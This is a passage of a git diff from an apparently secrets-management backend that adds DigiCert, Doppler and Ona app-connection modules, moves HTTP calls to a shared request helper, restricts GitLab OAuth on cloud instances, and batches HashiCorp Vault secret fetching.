TBitbucketConnectio headers }); - allWorkspaces = allWorkspaces.concat(data.values.map((workspace) => ({ slug: workspace.slug }))); + allWorkspaces = allWorkspaces.concat(data.values.map((membership) => ({ slug: membership.workspace.slug }))); nextUrl = data.next; iterationCount += 1; } diff --git a/backend/src/services/app-connection/dbt/dbt-connection-fns.ts b/backend/src/services/app-connection/dbt/dbt-connection-fns.ts index 4ce9d3cbb04..d059ece14e6 100644 --- a/backend/src/services/app-connection/dbt/dbt-connection-fns.ts +++ b/backend/src/services/app-connection/dbt/dbt-connection-fns.ts @@ -1,6 +1,7 @@ /* eslint-disable no-await-in-loop */ -import axios, { AxiosError } from "axios"; +import { AxiosError } from "axios"; +import { request } from "@app/lib/config/request"; import { BadRequestError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; import { blockLocalAndPrivateIpAddresses } from "@app/lib/validator"; @@ -53,7 +54,7 @@ export const retrieveDbtAccount = async (config: TDbtConnectionConfig) => { const dbtUrl = await getDbtUrl(config); - await axios.get(`${dbtUrl}/api/v2/accounts/${credentials.accountId}/`, { + await request.get(`${dbtUrl}/api/v2/accounts/${credentials.accountId}/`, { headers: { Authorization: `Bearer ${credentials.apiToken}` } @@ -90,7 +91,7 @@ export const listDbtProjects = async (config: TDbtConnectionConfig) => { const dbtUrl = await getDbtUrl(config); - const res = await axios.get( + const res = await request.get( `${dbtUrl}/api/v3/accounts/${credentials.accountId}/projects`, { headers: { diff --git a/backend/src/services/app-connection/digicert/digicert-connection-constants.ts b/backend/src/services/app-connection/digicert/digicert-connection-constants.ts new file mode 100644 index 00000000000..fec1fec4af0 --- /dev/null +++ b/backend/src/services/app-connection/digicert/digicert-connection-constants.ts @@ -0,0 +1 @@ +export const DIGICERT_AUTH_HEADER = "X-DC-DEVKEY"; diff --git a/backend/src/services/app-connection/digicert/digicert-connection-enums.ts b/backend/src/services/app-connection/digicert/digicert-connection-enums.ts new file mode 100644 index 00000000000..0e4f0a46a16 --- /dev/null +++ b/backend/src/services/app-connection/digicert/digicert-connection-enums.ts @@ -0,0 +1,8 @@ +export enum DigiCertConnectionMethod { + ApiKey = "api-key" +} + +export enum DigiCertRegion { + US = "us", + EU = "eu" +} diff --git a/backend/src/services/app-connection/digicert/digicert-connection-errors.ts b/backend/src/services/app-connection/digicert/digicert-connection-errors.ts new file mode 100644 index 00000000000..636324ec2cd --- /dev/null +++ b/backend/src/services/app-connection/digicert/digicert-connection-errors.ts @@ -0,0 +1,15 @@ +import { AxiosError } from "axios"; + +type TDigiCertErrorResponse = { errors?: { code?: string; message?: string }[] }; + +export const extractDigiCertErrorMessage = (error: unknown) => { + if (error instanceof AxiosError) { + const data = error.response?.data as TDigiCertErrorResponse | undefined; + const firstError = data?.errors?.[0]; + if (firstError?.message) { + return firstError.code ? `${firstError.message} (${firstError.code})` : firstError.message; + } + return error.message || "Unknown error"; + } + return (error as Error).message || "Unknown error"; +}; diff --git a/backend/src/services/app-connection/digicert/digicert-connection-fns.ts b/backend/src/services/app-connection/digicert/digicert-connection-fns.ts new file mode 100644 index 00000000000..f136db2efa9 --- /dev/null +++ b/backend/src/services/app-connection/digicert/digicert-connection-fns.ts @@ -0,0 +1,140 @@ +import { AxiosError } from "axios"; + +import { request } from "@app/lib/config/request"; +import { BadRequestError } from "@app/lib/errors"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { IntegrationUrls } from "@app/services/integration-auth/integration-list"; + +import { DIGICERT_AUTH_HEADER } from "./digicert-connection-constants"; +import { DigiCertConnectionMethod, DigiCertRegion } from "./digicert-connection-enums"; +import { extractDigiCertErrorMessage } from "./digicert-connection-errors"; +import { + TDigiCertConnection, + TDigiCertConnectionConfig, + TDigiCertOrganization, + TDigiCertProduct +} from "./digicert-connection-types"; + +export const getDigiCertConnectionListItem = () => { + return { + name: "DigiCert" as const, + app: AppConnection.DigiCert as const, + methods: Object.values(DigiCertConnectionMethod) as [DigiCertConnectionMethod.ApiKey] + }; +}; + +export const getDigiCertApiBaseUrl = (region: DigiCertRegion): string => { + switch (region) { + case DigiCertRegion.EU: + return IntegrationUrls.DIGICERT_SERVICES_API_URL_EU; + case DigiCertRegion.US: + default: + return IntegrationUrls.DIGICERT_SERVICES_API_URL; + } +}; + +export const validateDigiCertConnectionCredentials = async (config: TDigiCertConnectionConfig) => { + const { credentials: inputCredentials } = config; + const baseUrl = getDigiCertApiBaseUrl(inputCredentials.region); + + try { + await request.get(`${baseUrl}/organization`, { + headers: { + [DIGICERT_AUTH_HEADER]: inputCredentials.apiKey, + "Content-Type": "application/json" + } + }); + } catch (error: unknown) { + if (error instanceof AxiosError) { + throw new BadRequestError({ + message: `Failed to validate credentials: ${extractDigiCertErrorMessage(error)}` + }); + } + throw new BadRequestError({ + message: `Unable to validate connection: ${(error as Error).message || "Verify credentials"}` + }); + } + + return inputCredentials; +}; + +type TDigiCertOrganizationsResponse = { + organizations: { + id: number; + name: string; + display_name?: string; + status?: string; + }[]; +}; + +export const listDigiCertOrganizations = async ( + appConnection: TDigiCertConnection +): Promise => { + const { apiKey, region } = appConnection.credentials; + const baseUrl = getDigiCertApiBaseUrl(region); + + try { + const { data } = await request.get(`${baseUrl}/organization`, { + headers: { + [DIGICERT_AUTH_HEADER]: apiKey, + "Content-Type": "application/json" + } + }); + + return (data.organizations ?? []).map((org) => ({ + id: org.id, + name: org.name, + displayName: org.display_name, + status: org.status + })); + } catch (error: unknown) { + if (error instanceof AxiosError) { + throw new BadRequestError({ + message: `Failed to list DigiCert organizations: ${extractDigiCertErrorMessage(error)}` + }); + } + throw error; + } +}; + +type TDigiCertProductsResponse = { + products: { + name_id: string; + name: string; + type?: string; + validation_type?: string; + signature_hash_types?: { allowed_hash_types?: { id?: string }[] }; + }[]; +}; + +const DIGICERT_SSL_PRODUCT_TYPE = "ssl_certificate"; + +export const listDigiCertProducts = async (appConnection: TDigiCertConnection): Promise => { + const { apiKey, region } = appConnection.credentials; + const baseUrl = getDigiCertApiBaseUrl(region); + + try { + const { data } = await request.get(`${baseUrl}/product`, { + headers: { + [DIGICERT_AUTH_HEADER]: apiKey, + "Content-Type": "application/json" + } + }); + + return (data.products ?? []) + .filter((product) => product.type === DIGICERT_SSL_PRODUCT_TYPE) + .map((product) => ({ + nameId: product.name_id, + name: product.name, + type: product.type, + validationType: product.validation_type + })); + } catch (error: unknown) { + if (error instanceof AxiosError) { + throw new BadRequestError({ + message: `Failed to list DigiCert products: ${extractDigiCertErrorMessage(error)}` + }); + } + throw error; + } +}; diff --git a/backend/src/services/app-connection/digicert/digicert-connection-schemas.ts b/backend/src/services/app-connection/digicert/digicert-connection-schemas.ts new file mode 100644 index 00000000000..409c4d70174 --- /dev/null +++ b/backend/src/services/app-connection/digicert/digicert-connection-schemas.ts @@ -0,0 +1,62 @@ +import z from "zod"; + +import { AppConnections } from "@app/lib/api-docs"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { + BaseAppConnectionSchema, + GenericCreateAppConnectionFieldsSchema, + GenericUpdateAppConnectionFieldsSchema +} from "@app/services/app-connection/app-connection-schemas"; + +import { APP_CONNECTION_NAME_MAP } from "../app-connection-maps"; +import { DigiCertConnectionMethod, DigiCertRegion } from "./digicert-connection-enums"; + +export const DigiCertConnectionApiKeyCredentialsSchema = z.object({ + apiKey: z.string().trim().min(1, "API Key required").describe(AppConnections.CREDENTIALS.DIGICERT.apiKey), + region: z.nativeEnum(DigiCertRegion).describe(AppConnections.CREDENTIALS.DIGICERT.region) +}); + +const BaseDigiCertConnectionSchema = BaseAppConnectionSchema.extend({ + app: z.literal(AppConnection.DigiCert) +}); + +export const DigiCertConnectionSchema = BaseDigiCertConnectionSchema.extend({ + method: z.literal(DigiCertConnectionMethod.ApiKey), + credentials: DigiCertConnectionApiKeyCredentialsSchema +}); + +export const SanitizedDigiCertConnectionSchema = z.discriminatedUnion("method", [ + BaseDigiCertConnectionSchema.extend({ + method: z.literal(DigiCertConnectionMethod.ApiKey), + credentials: DigiCertConnectionApiKeyCredentialsSchema.pick({ region: true }) + }).describe(JSON.stringify({ title: `${APP_CONNECTION_NAME_MAP[AppConnection.DigiCert]} (API Key)` })) +]); + +export const ValidateDigiCertConnectionCredentialsSchema = z.discriminatedUnion("method", [ + z.object({ + method: z.literal(DigiCertConnectionMethod.ApiKey).describe(AppConnections.CREATE(AppConnection.DigiCert).method), + credentials: DigiCertConnectionApiKeyCredentialsSchema.describe( + AppConnections.CREATE(AppConnection.DigiCert).credentials + ) + }) +]); + +export const CreateDigiCertConnectionSchema = ValidateDigiCertConnectionCredentialsSchema.and( + GenericCreateAppConnectionFieldsSchema(AppConnection.DigiCert) +); + +export const UpdateDigiCertConnectionSchema = z + .object({ + credentials: DigiCertConnectionApiKeyCredentialsSchema.optional().describe( + AppConnections.UPDATE(AppConnection.DigiCert).credentials + ) + }) + .and(GenericUpdateAppConnectionFieldsSchema(AppConnection.DigiCert)); + +export const DigiCertConnectionListItemSchema = z + .object({ + name: z.literal("DigiCert"), + app: z.literal(AppConnection.DigiCert), + methods: z.nativeEnum(DigiCertConnectionMethod).array() + }) + .describe(JSON.stringify({ title: APP_CONNECTION_NAME_MAP[AppConnection.DigiCert] })); diff --git a/backend/src/services/app-connection/digicert/digicert-connection-service.ts b/backend/src/services/app-connection/digicert/digicert-connection-service.ts new file mode 100644 index 00000000000..adc7fcc03fb --- /dev/null +++ b/backend/src/services/app-connection/digicert/digicert-connection-service.ts @@ -0,0 +1,39 @@ +import { logger } from "@app/lib/logger"; +import { OrgServiceActor } from "@app/lib/types"; + +import { AppConnection } from "../app-connection-enums"; +import { listDigiCertOrganizations, listDigiCertProducts } from "./digicert-connection-fns"; +import { TDigiCertConnection } from "./digicert-connection-types"; + +type TGetAppConnectionFunc = ( + app: AppConnection, + connectionId: string, + actor: OrgServiceActor +) => Promise; + +export const digicertConnectionService = (getAppConnection: TGetAppConnectionFunc) => { + const listOrganizations = async (connectionId: string, actor: OrgServiceActor) => { + const appConnection = await getAppConnection(AppConnection.DigiCert, connectionId, actor); + try { + return await listDigiCertOrganizations(appConnection); + } catch (error) { + logger.error(error, `Failed to list DigiCert organizations [connectionId=${connectionId}]`); + return []; + } + }; + + const listProducts = async (connectionId: string, actor: OrgServiceActor) => { + const appConnection = await getAppConnection(AppConnection.DigiCert, connectionId, actor); + try { + return await listDigiCertProducts(appConnection); + } catch (error) { + logger.error(error, `Failed to list DigiCert products [connectionId=${connectionId}]`); + return []; + } + }; + + return { + listOrganizations, + listProducts + }; +}; diff --git a/backend/src/services/app-connection/digicert/digicert-connection-types.ts b/backend/src/services/app-connection/digicert/digicert-connection-types.ts new file mode 100644 index 00000000000..3d424e34202 --- /dev/null +++ b/backend/src/services/app-connection/digicert/digicert-connection-types.ts @@ -0,0 +1,39 @@ +import z from "zod"; + +import { DiscriminativePick } from "@app/lib/types"; + +import { AppConnection } from "../app-connection-enums"; +import { + CreateDigiCertConnectionSchema, + DigiCertConnectionSchema, + ValidateDigiCertConnectionCredentialsSchema +} from "./digicert-connection-schemas"; + +export type TDigiCertConnection = z.infer; + +export type TDigiCertConnectionInput = z.infer & { + app: AppConnection.DigiCert; +}; + +export type TValidateDigiCertConnectionCredentialsSchema = typeof ValidateDigiCertConnectionCredentialsSchema; + +export type TDigiCertConnectionConfig = DiscriminativePick< + TDigiCertConnectionInput, + "method" | "app" | "credentials" +> & { + orgId: string; +}; + +export type TDigiCertOrganization = { + id: number; + name: string; + displayName?: string; + status?: string; +}; + +export type TDigiCertProduct = { + nameId: string; + name: string; + type?: string; + validationType?: string; +}; diff --git a/backend/src/services/app-connection/digicert/index.ts b/backend/src/services/app-connection/digicert/index.ts new file mode 100644 index 00000000000..de9105d54e6 --- /dev/null +++ b/backend/src/services/app-connection/digicert/index.ts @@ -0,0 +1,5 @@ +export * from "./digicert-connection-enums"; +export * from "./digicert-connection-errors"; +export * from "./digicert-connection-fns"; +export * from "./digicert-connection-schemas"; +export * from "./digicert-connection-types"; diff --git a/backend/src/services/app-connection/doppler/doppler-connection-enums.ts b/backend/src/services/app-connection/doppler/doppler-connection-enums.ts new file mode 100644 index 00000000000..2bc9e4f9db6 --- /dev/null +++ b/backend/src/services/app-connection/doppler/doppler-connection-enums.ts @@ -0,0 +1,3 @@ +export enum DopplerConnectionMethod { + ApiToken = "api-token" +} diff --git a/backend/src/services/app-connection/doppler/doppler-connection-fns.ts b/backend/src/services/app-connection/doppler/doppler-connection-fns.ts new file mode 100644 index 00000000000..4316f0b4d70 --- /dev/null +++ b/backend/src/services/app-connection/doppler/doppler-connection-fns.ts @@ -0,0 +1,174 @@ +import { AxiosError } from "axios"; + +import { request } from "@app/lib/config/request"; +import { BadRequestError } from "@app/lib/errors"; + +import { AppConnection } from "../app-connection-enums"; +import { DopplerConnectionMethod } from "./doppler-connection-enums"; +import { + TDopplerConfig, + TDopplerConnection, + TDopplerConnectionConfig, + TDopplerEnvironment, + TDopplerProject, + TDopplerSecret +} from "./doppler-connection-types"; + +const DOPPLER_API_URL = "https://api.doppler.com"; + +export const getDopplerConnectionListItem = () => { + return { + name: "Doppler" as const, + app: AppConnection.Doppler as const, + methods: Object.values(DopplerConnectionMethod) as [DopplerConnectionMethod.ApiToken] + }; +}; + +export const validateDopplerConnectionCredentials = async (config: TDopplerConnectionConfig) => { + const { credentials: inputCredentials } = config; + + try { + await request.get(`${DOPPLER_API_URL}/v3/me`, { + headers: { + Authorization: `Bearer ${inputCredentials.apiToken}` + } + }); + } catch (error: unknown) { + if (error instanceof AxiosError) { + const responseData = error.response?.data as { messages?: string[] } | undefined; + throw new BadRequestError({ + message: `Failed to validate Doppler credentials: ${responseData?.messages?.join(", ") || error.message || "Unknown error"}` + }); + } + throw new BadRequestError({ + message: "Unable to validate Doppler connection: verify credentials" + }); + } + + return inputCredentials; +}; + +export const listDopplerProjects = async (appConnection: TDopplerConnection): Promise => { + const { + credentials: { apiToken } + } = appConnection; + + const projects: TDopplerProject[] = []; + let page = 1; + const perPage = 50; + const maxPages = 20; + let hasMore = true; + + while (hasMore && page <= maxPages) { + // eslint-disable-next-line no-await-in-loop + const res = await request.get<{ projects: TDopplerProject[]; page: number }>(`${DOPPLER_API_URL}/v3/projects`, { + params: { page, per_page: perPage }, + headers: { Authorization: `Bearer ${apiToken}` } + }); + + projects.push(...res.data.projects); + + if (res.data.projects.length < perPage) { + hasMore = false; + } else { + page += 1; + } + } + + return projects; +}; + +export const listDopplerEnvironments = async ( + appConnection: TDopplerConnection, + projectSlug: string +): Promise => { + const { + credentials: { apiToken } + } = appConnection; + + const environments: TDopplerEnvironment[] = []; + let page = 1; + const perPage = 50; + const maxPages = 20; + let hasMore = true; + + while (hasMore && page <= maxPages) { + // eslint-disable-next-line no-await-in-loop + const res = await request.get<{ environments: TDopplerEnvironment[] }>(`${DOPPLER_API_URL}/v3/environments`, { + params: { project: projectSlug, page, per_page: perPage }, + headers: { Authorization: `Bearer ${apiToken}` } + }); + + environments.push(...res.data.environments); + + if (res.data.environments.length < perPage) { + hasMore = false; + } else { + page += 1; + } + } + + return environments; +}; + +export const listDopplerConfigs = async ( + appConnection: TDopplerConnection, + projectSlug: string +): Promise => { + const { + credentials: { apiToken } + } = appConnection; + + const configs: TDopplerConfig[] = []; + let page = 1; + const perPage = 50; + const maxPages = 20; + let hasMore = true; + + while (hasMore && page <= maxPages) { + // eslint-disable-next-line no-await-in-loop + const res = await request.get<{ configs: TDopplerConfig[] }>(`${DOPPLER_API_URL}/v3/configs`, { + params: { project: projectSlug, page, per_page: perPage }, + headers: { Authorization: `Bearer ${apiToken}` } + }); + + configs.push(...res.data.configs); + + if (res.data.configs.length < perPage) { + hasMore = false; + } else { + page += 1; + } + } + + return configs; +}; + +export const getDopplerSecrets = async ( + appConnection: TDopplerConnection, + projectSlug: string, + environmentSlug: string +): Promise> => { + const { + credentials: { apiToken } + } = appConnection; + + const res = await request.get<{ secrets: Record }>( + `${DOPPLER_API_URL}/v3/configs/config/secrets`, + { + params: { + project: projectSlug, + config: environmentSlug, + include_dynamic_secrets: false, + include_managed_secrets: false + }, + headers: { Authorization: `Bearer ${apiToken}` } + } + ); + + return Object.fromEntries( + Object.entries(res.data.secrets) + .filter(([, v]) => v.raw !== null) + .map(([k, v]) => [k, v.raw as string]) + ); +}; diff --git a/backend/src/services/app-connection/doppler/doppler-connection-schema.ts b/backend/src/services/app-connection/doppler/doppler-connection-schema.ts new file mode 100644 index 00000000000..d0a0a1ebca1 --- /dev/null +++ b/backend/src/services/app-connection/doppler/doppler-connection-schema.ts @@ -0,0 +1,59 @@ +import z from "zod"; + +import { AppConnections } from "@app/lib/api-docs"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { + BaseAppConnectionSchema, + GenericCreateAppConnectionFieldsSchema, + GenericUpdateAppConnectionFieldsSchema +} from "@app/services/app-connection/app-connection-schemas"; + +import { APP_CONNECTION_NAME_MAP } from "../app-connection-maps"; +import { DopplerConnectionMethod } from "./doppler-connection-enums"; + +export const DopplerConnectionApiTokenCredentialsSchema = z.object({ + apiToken: z.string().trim().min(1, "API token required").max(512, "API token cannot exceed 512 characters") +}); + +const BaseDopplerConnectionSchema = BaseAppConnectionSchema.extend({ app: z.literal(AppConnection.Doppler) }); + +export const DopplerConnectionSchema = BaseDopplerConnectionSchema.extend({ + method: z.literal(DopplerConnectionMethod.ApiToken), + credentials: DopplerConnectionApiTokenCredentialsSchema +}); + +export const SanitizedDopplerConnectionSchema = z.discriminatedUnion("method", [ + BaseDopplerConnectionSchema.extend({ + method: z.literal(DopplerConnectionMethod.ApiToken), + credentials: DopplerConnectionApiTokenCredentialsSchema.pick({}) + }).describe(JSON.stringify({ title: `${APP_CONNECTION_NAME_MAP[AppConnection.Doppler]} (API Token)` })) +]); + +export const ValidateDopplerConnectionCredentialsSchema = z.discriminatedUnion("method", [ + z.object({ + method: z.literal(DopplerConnectionMethod.ApiToken).describe(AppConnections.CREATE(AppConnection.Doppler).method), + credentials: DopplerConnectionApiTokenCredentialsSchema.describe( + AppConnections.CREATE(AppConnection.Doppler).credentials + ) + }) +]); + +export const CreateDopplerConnectionSchema = ValidateDopplerConnectionCredentialsSchema.and( + GenericCreateAppConnectionFieldsSchema(AppConnection.Doppler) +); + +export const UpdateDopplerConnectionSchema = z + .object({ + credentials: DopplerConnectionApiTokenCredentialsSchema.optional().describe( + AppConnections.UPDATE(AppConnection.Doppler).credentials + ) + }) + .and(GenericUpdateAppConnectionFieldsSchema(AppConnection.Doppler)); + +export const DopplerConnectionListItemSchema = z + .object({ + name: z.literal("Doppler"), + app: z.literal(AppConnection.Doppler), + methods: z.nativeEnum(DopplerConnectionMethod).array() + }) + .describe(JSON.stringify({ title: APP_CONNECTION_NAME_MAP[AppConnection.Doppler] })); diff --git a/backend/src/services/app-connection/doppler/doppler-connection-service.ts b/backend/src/services/app-connection/doppler/doppler-connection-service.ts new file mode 100644 index 00000000000..98c55a49359 --- /dev/null +++ b/backend/src/services/app-connection/doppler/doppler-connection-service.ts @@ -0,0 +1,61 @@ +import { logger } from "@app/lib/logger"; +import { OrgServiceActor } from "@app/lib/types"; + +import { AppConnection } from "../app-connection-enums"; +import { + getDopplerSecrets, + listDopplerConfigs, + listDopplerEnvironments, + listDopplerProjects +} from "./doppler-connection-fns"; +import { TDopplerConnection } from "./doppler-connection-types"; + +type TGetAppConnectionFunc = ( + app: AppConnection, + connectionId: string, + actor: OrgServiceActor +) => Promise; + +export const dopplerConnectionService = (getAppConnection: TGetAppConnectionFunc) => { + const listProjects = async (connectionId: string, actor: OrgServiceActor) => { + const appConnection = await getAppConnection(AppConnection.Doppler, connectionId, actor); + try { + return await listDopplerProjects(appConnection); + } catch (error) { + logger.error(error, "Failed to list projects for Doppler connection"); + return []; + } + }; + + const listEnvironments = async (connectionId: string, projectSlug: string, actor: OrgServiceActor) => { + const appConnection = await getAppConnection(AppConnection.Doppler, connectionId, actor); + try { + return await listDopplerEnvironments(appConnection, projectSlug); + } catch (error) { + logger.error(error, "Failed to list environments for Doppler connection"); + return []; + } + }; + + const listConfigs = async (connectionId: string, projectSlug: string, actor: OrgServiceActor) => { + const appConnection = await getAppConnection(AppConnection.Doppler, connectionId, actor); + try { + return await listDopplerConfigs(appConnection, projectSlug); + } catch (error) { + logger.error(error, "Failed to list configs for Doppler connection"); + return []; + } + }; + + const getSecrets = async ( + connectionId: string, + projectSlug: string, + environmentSlug: string, + actor: OrgServiceActor + ) => { + const appConnection = await getAppConnection(AppConnection.Doppler, connectionId, actor); + return getDopplerSecrets(appConnection, projectSlug, environmentSlug); + }; + + return { listProjects, listEnvironments, listConfigs, getSecrets }; +}; diff --git a/backend/src/services/app-connection/doppler/doppler-connection-types.ts b/backend/src/services/app-connection/doppler/doppler-connection-types.ts new file mode 100644 index 00000000000..e405d877d3f --- /dev/null +++ b/backend/src/services/app-connection/doppler/doppler-connection-types.ts @@ -0,0 +1,51 @@ +import z from "zod"; + +import { DiscriminativePick } from "@app/lib/types"; + +import { AppConnection } from "../app-connection-enums"; +import { + CreateDopplerConnectionSchema, + DopplerConnectionSchema, + ValidateDopplerConnectionCredentialsSchema +} from "./doppler-connection-schema"; + +export type TDopplerConnection = z.infer; + +export type TDopplerConnectionInput = z.infer & { + app: AppConnection.Doppler; +}; + +export type TValidateDopplerConnectionCredentialsSchema = typeof ValidateDopplerConnectionCredentialsSchema; + +export type TDopplerConnectionConfig = DiscriminativePick & { + orgId: string; +}; + +export type TDopplerProject = { + id: string; + slug: string; + name: string; + description?: string | null; +}; + +export type TDopplerEnvironment = { + id: string; + slug: string; + name: string; + project: string; + initialFetchAt: string | null; + createdAt: string; +}; + +export type TDopplerConfig = { + name: string; + root: boolean; + locked: boolean; + environment: string; + project: string; +}; + +export type TDopplerSecret = { + raw: string | null; + computed: string | null; +}; diff --git a/backend/src/services/app-connection/doppler/index.ts b/backend/src/services/app-connection/doppler/index.ts new file mode 100644 index 00000000000..5ff3c4c11cb --- /dev/null +++ b/backend/src/services/app-connection/doppler/index.ts @@ -0,0 +1,5 @@ +export * from "./doppler-connection-enums"; +export * from "./doppler-connection-fns"; +export * from "./doppler-connection-schema"; +export * from "./doppler-connection-service"; +export * from "./doppler-connection-types"; diff --git a/backend/src/services/app-connection/gitlab/gitlab-connection-fns.ts b/backend/src/services/app-connection/gitlab/gitlab-connection-fns.ts index ca0833e40b7..37eeeaeb158 100644 --- a/backend/src/services/app-connection/gitlab/gitlab-connection-fns.ts +++ b/backend/src/services/app-connection/gitlab/gitlab-connection-fns.ts @@ -69,9 +69,19 @@ export const refreshGitLabToken = async ( kmsService: Pick, instanceUrl?: string ): Promise => { - const { INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_ID, INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_SECRET, SITE_URL } = - getConfig(); - if (!INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_SECRET || !INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_ID || !SITE_URL) { + const { + INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_ID, + INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_SECRET, + SITE_URL, + isCloud + } = getConfig(); + if ( + !INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_SECRET || + !INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_ID || + !SITE_URL || + // Cloud instances do not support OAuth authentication + isCloud + ) { throw new InternalServerError({ message: `GitLab environment variables have not been configured` }); @@ -128,9 +138,18 @@ export const exchangeGitLabOAuthCode = async ( code: string, instanceUrl?: string ): Promise => { - const { INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_ID, INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_SECRET, SITE_URL } = - getConfig(); - if (!INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_SECRET || !INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_ID || !SITE_URL) { + const { + INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_ID, + INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_SECRET, + SITE_URL, + isCloud + } = getConfig(); + if ( + !INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_SECRET || + !INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_ID || + !SITE_URL || + isCloud + ) { throw new InternalServerError({ message: `GitLab environment variables have not been configured` }); diff --git a/backend/src/services/app-connection/hc-vault/hc-vault-connection-fns.ts b/backend/src/services/app-connection/hc-vault/hc-vault-connection-fns.ts index 877b150a6a9..d50e4e9bfab 100644 --- a/backend/src/services/app-connection/hc-vault/hc-vault-connection-fns.ts +++ b/backend/src/services/app-connection/hc-vault/hc-vault-connection-fns.ts @@ -36,7 +36,7 @@ import { } from "./hc-vault-connection-types"; // HashiCorp Vault stores JSON data, so values can be any valid JSON type -type JsonValue = string | number | boolean | null | JsonValue[] | { [key: string]: JsonValue }; +export type JsonValue = string | number | boolean | null | JsonValue[] | { [key: string]: JsonValue }; export const convertVaultValueToString = (value: JsonValue): string => { if (value === null) { @@ -734,16 +734,25 @@ export const listHCVaultSecretPaths = async ( return allSecretPaths; }; -export const getHCVaultSecretsForPath = async ( - namespace: string, - secretPath: string, - connection: THCVaultConnection, - gatewayService: Pick, - gatewayV2Service: Pick -) => { - const instanceUrl = await getHCVaultInstanceUrl(connection); - const accessToken = await getHCVaultAccessToken(connection, gatewayService, gatewayV2Service); - +const fetchVaultSecretAtPath = async ({ + namespace, + secretPath, + mounts, + instanceUrl, + accessToken, + connection, + gatewayService, + gatewayV2Service +}: { + namespace: string; + secretPath: string; + mounts: Awaited>; + instanceUrl: string; + accessToken: string; + connection: THCVaultConnection; + gatewayService: Pick; + gatewayV2Service: Pick; +}): Promise> => { try { // Extract mount and path from the secretPath // secretPath format: {mount}/{path} @@ -757,8 +766,6 @@ export const getHCVaultSecretsForPath = async ( }); } - // Get mounts to determine KV version - const mounts = await listHCVaultMounts(connection, gatewayService, gatewayV2Service, namespace); const mount = mounts.find((m) => m.path.replace(/\/$/, "") === mountPath); if (!mount) { @@ -829,6 +836,37 @@ export const getHCVaultSecretsForPath = async ( } }; +export const getHCVaultSecretsForPaths = async ( + namespace: string, + secretPaths: string[], + connection: THCVaultConnection, + gatewayService: Pick, + gatewayV2Service: Pick +): Promise }>> => { + const instanceUrl = await getHCVaultInstanceUrl(connection); + const accessToken = await getHCVaultAccessToken(connection, gatewayService, gatewayV2Service); + const mounts = await listHCVaultMounts(connection, gatewayService, gatewayV2Service, namespace); + const limiter = createConcurrencyLimiter(HC_VAULT_CONCURRENCY_LIMIT); + + return Promise.all( + secretPaths.map((vaultSecretPath) => + limiter(async () => { + const secrets = await fetchVaultSecretAtPath({ + namespace, + secretPath: vaultSecretPath, + mounts, + instanceUrl, + accessToken, + connection, + gatewayService, + gatewayV2Service + }); + return { vaultSecretPath, secrets }; + }) + ) + ); +}; + export const getHCVaultAuthMounts = async ( namespace: string, authType: HCVaultAuthType | undefined, diff --git a/backend/src/services/app-connection/ona/index.ts b/backend/src/services/app-connection/ona/index.ts new file mode 100644 index 00000000000..88ebcf97f46 --- /dev/null +++ b/backend/src/services/app-connection/ona/index.ts @@ -0,0 +1,4 @@ +export * from "./ona-connection-enums"; +export * from "./ona-connection-fns"; +export * from "./ona-connection-schemas"; +export * from "./ona-connection-types"; diff --git a/backend/src/services/app-connection/ona/ona-connection-enums.ts b/backend/src/services/app-connection/ona/ona-connection-enums.ts new file mode 100644 index 00000000000..41cf8b38562 --- /dev/null +++ b/backend/src/services/app-connection/ona/ona-connection-enums.ts @@ -0,0 +1,3 @@ +export enum OnaConnectionMethod { + PersonalAccessToken = "personal-access-token" +} diff --git a/backend/src/services/app-connection/ona/ona-connection-fns.ts b/backend/src/services/app-connection/ona/ona-connection-fns.ts new file mode 100644 index 00000000000..e2514d8a79b --- /dev/null +++ b/backend/src/services/app-connection/ona/ona-connection-fns.ts @@ -0,0 +1,101 @@ +/* eslint-disable no-await-in-loop */ +import { AxiosError } from "axios"; + +import { request } from "@app/lib/config/request"; +import { BadRequestError } from "@app/lib/errors"; +import { logger } from "@app/lib/logger"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; + +import { OnaConnectionMethod } from "./ona-connection-enums"; +import { TOnaConnection, TOnaConnectionConfig, TOnaProject, TOnaProjectListResponse } from "./ona-connection-types"; + +const GET_AUTHENTICATED_IDENTITY_PATH = "/gitpod.v1.IdentityService/GetAuthenticatedIdentity"; +const ONA_LIST_PROJECTS_PATH = "/gitpod.v1.ProjectService/ListProjects"; +const ONA_API_URL = "https://app.gitpod.io/api"; +const ONA_PAGE_SIZE = 100; + +export const getOnaConnectionListItem = () => { + return { + name: "Ona" as const, + app: AppConnection.Ona as const, + methods: Object.values(OnaConnectionMethod) as [OnaConnectionMethod.PersonalAccessToken] + }; +}; + +export const validateOnaConnectionCredentials = async (config: TOnaConnectionConfig) => { + const { credentials: inputCredentials } = config; + + try { + await request.post( + `${ONA_API_URL}${GET_AUTHENTICATED_IDENTITY_PATH}`, + {}, + { + headers: { + Authorization: `Bearer ${inputCredentials.personalAccessToken}`, + "Content-Type": "application/json" + } + } + ); + } catch (error: unknown) { + if (error instanceof AxiosError) { + throw new BadRequestError({ + message: `Failed to validate credentials: ${ + error.response?.data ? JSON.stringify(error.response?.data) : error.message || "Unknown error" + }` + }); + } + throw new BadRequestError({ + message: `Unable to validate connection: ${(error as Error).message || "Verify credentials"}` + }); + } + + return inputCredentials; +}; + +export const listOnaProjects = async (appConnection: TOnaConnection): Promise => { + const { personalAccessToken } = appConnection.credentials; + + const allProjects: TOnaProject[] = []; + let token: string | undefined; + let hasMoreProjects = true; + + try { + while (hasMoreProjects) { + const body: { pagination: { 